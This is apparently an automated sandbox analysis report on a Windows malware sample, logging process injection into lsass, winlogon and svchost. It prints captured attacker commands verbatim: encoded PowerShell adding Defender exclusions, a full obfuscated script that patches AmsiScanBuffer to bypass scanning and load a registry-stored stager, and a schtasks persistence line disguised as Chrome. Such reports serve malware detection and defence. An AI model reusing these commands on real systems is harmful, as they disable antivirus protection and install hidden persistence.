Source: C:\Windows\System32\nslookup.exe	Code function: 22_2_0000000140005D5C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_0000000140005D5C
Source: C:\Windows\System32\nslookup.exe	Code function: 22_2_0000000140002B10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_0000000140002B10
Source: C:\Windows\System32\nslookup.exe	Code function: 22_2_000000014000235C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	22_2_000000014000235C
Source: C:\Windows\System32\dllhost.exe	Code function: 39_2_0000000140002338 SetUnhandledExceptionFilter,_invalid_parameter_noinfo,	39_2_0000000140002338
Source: C:\Windows\System32\dllhost.exe	Code function: 39_2_0000000140002C90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	39_2_0000000140002C90
Source: C:\Windows\System32\dllhost.exe	Code function: 39_2_00000001400024DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	39_2_00000001400024DC
Source: C:\Windows\System32\dllhost.exe	Code function: 39_2_000000014000624C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	39_2_000000014000624C
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001AFDDD09098 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	42_2_000001AFDDD09098
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001AFDDD08450 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	42_2_000001AFDDD08450
Source: C:\Windows\System32\winlogon.exe	Code function: 42_2_000001AFDDD0BEC8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	42_2_000001AFDDD0BEC8
Source: C:\Windows\System32\lsass.exe	Code function: 44_2_00000240B2BB8450 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	44_2_00000240B2BB8450
Source: C:\Windows\System32\lsass.exe	Code function: 44_2_00000240B2BB9098 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	44_2_00000240B2BB9098
Source: C:\Windows\System32\lsass.exe	Code function: 44_2_00000240B2BBBEC8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	44_2_00000240B2BBBEC8
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001CAF3D08450 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	47_2_000001CAF3D08450
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001CAF3D09098 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	47_2_000001CAF3D09098
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000001CAF3D0BEC8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	47_2_000001CAF3D0BEC8
Source: C:\Windows\System32\svchost.exe	Code function: 49_2_000001B8BFF49098 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	49_2_000001B8BFF49098
Source: C:\Windows\System32\svchost.exe	Code function: 49_2_000001B8BFF48450 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	49_2_000001B8BFF48450
Source: C:\Windows\System32\svchost.exe	Code function: 49_2_000001B8BFF4BEC8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	49_2_000001B8BFF4BEC8

HIPS / PFW / Operating System Protection Evasion

Encrypted powershell cmdline option found

Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-MpPreference -ExclusionExtension @('exe','dll') -Force
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-MpPreference -ExclusionExtension @('exe','dll') -Force	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Memory allocated: C:\Windows\System32\nslookup.exe base: 140000000 protect: page execute and read and write			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140000000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 1AFDDCD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 240B2B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CAF3CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B8BFF10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 2C633850000 value starts with: 4D5A

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\winlogon.exe EIP: DDCD35D0
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\lsass.exe EIP: B2B835D0
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: F3CD35D0
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: BFF135D0

Writes to foreign memory regions

Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4CF1008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140000000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140001000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Memory written: C:\Windows\System32\nslookup.exe base: 14000E000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140019000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Memory written: C:\Windows\System32\nslookup.exe base: 14001B000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Memory written: C:\Windows\System32\nslookup.exe base: 14001C000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Memory written: C:\Windows\System32\nslookup.exe base: 14001D000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140056000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Memory written: C:\Windows\System32\nslookup.exe base: 44EB131010	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 14000E000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140018000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 14001A000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 14001B000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 14001C000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 14003F000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: EE637B6010
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 1AFDDCD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 240B2B80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CAF3CD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B8BFF10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 2C633850000

.NET source code references suspicious native API functions

Source: 34432.exe.1.dr, u200f????????????????????????????????????????.cs	Reference to suspicious API methods: ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll')
Source: 2.3.ChiefKeefofficialnaxyi_crypted(6).exe.2670000.0.unpack, u0003u2006.cs	Reference to suspicious API methods: ('\\x02', 'LoadLibrary@kernel32.dll'), ('\\x02', 'GetProcAddress@kernel32.dll')
Source: chrome.exe.4.dr, u200f????????????????????????????????????????.cs	Reference to suspicious API methods: ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll')
Source: 5.2.AppLaunch.exe.400000.0.unpack, u0003u2006.cs	Reference to suspicious API methods: ('\\x02', 'LoadLibrary@kernel32.dll'), ('\\x02', 'GetProcAddress@kernel32.dll')

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Roaming\34432.exe	Thread register set: target process: 7056			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 2324

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Users\user\AppData\Roaming\34432.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$qKHXRLjxcQb.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');$qKHXRLjxcQb.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$NibVxWxTFc,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');Write-Output $qKHXRLjxcQb.CreateType();}$uYKrZWxknTiUv=([AppDomain]::CurrentDomain.GetAssemblies()\|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$SpNyfScDlNPPHB=$uYKrZWxknTiUv.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RRmRtbQVOsCwqbtFCRP=oBYZxpoBuJDg @([String])([IntPtr]);$CSrLsWTvUKtnfJeCoYnQHQ=oBYZxpoBuJDg @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LbwxtlPJWDL=$uYKrZWxknTiUv.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$UsbtvKZkuSsHuw=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Load'+'LibraryA')));$GBWVSxTZRtiWMYLEL=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Vir'+'tual'+'Pro'+'tect')));$zcmbglj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UsbtvKZkuSsHuw,$RRmRtbQVOsCwqbtFCRP).Invoke('a'+'m'+'si.dll');$NtWqUAjxRFzIehWzj=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$zcmbglj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$QZnCEHiAlz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,4,[ref]$QZnCEHiAlz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$NtWqUAjxRFzIehWzj,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,0x20,[ref]$QZnCEHiAlz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$JkETjFsAcrF.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');$JkETjFsAcrF.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$jXrdWylJno,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');Write-Output $JkETjFsAcrF.CreateType();}$lPmVEIqLxWSBJ=([AppDomain]::CurrentDomain.GetAssemblies()\|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$oknnqNPEawtCof=$lPmVEIqLxWSBJ.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PfTqTVeTqNbzEtTZAwA=JcVEStQtPhkP @([String])([IntPtr]);$FBhryrsEcCEQMAYVVFmrjj=JcVEStQtPhkP @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gdWNaSIjpXI=$lPmVEIqLxWSBJ.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$MwCkRVFOfjwTFV=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Load'+'LibraryA')));$PwfBMMcphOddVTLUY=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Vir'+'tual'+'Pro'+'tect')));$FyAgKxj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MwCkRVFOfjwTFV,$PfTqTVeTqNbzEtTZAwA).Invoke('a'+'m'+'si.dll');$GiLFGjttEZsjytHxc=$oknnqNPEawtCof.Invoke($Null,@([Object]$FyAgKxj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$XarcXAurwd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,4,[ref]$XarcXAurwd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$GiLFGjttEZsjytHxc,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,0x20,[ref]$XarcXAurwd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Users\user\AppData\Roaming\34432.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process created: C:\Windows\System32\nslookup.exe C:\Windows\System32\nslookup.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process created: C:\Windows\System32\cmd.exe cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exe	Process created: C:\Windows\System32\cmd.exe cmd" cmd /c "C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{bb7b2400-d282-40c3-8b5b-9f36c353d0f9}
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exe"
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\Chrome\chrome.exe C:\Users\user\AppData\Roaming\Chrome\chrome.exe
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
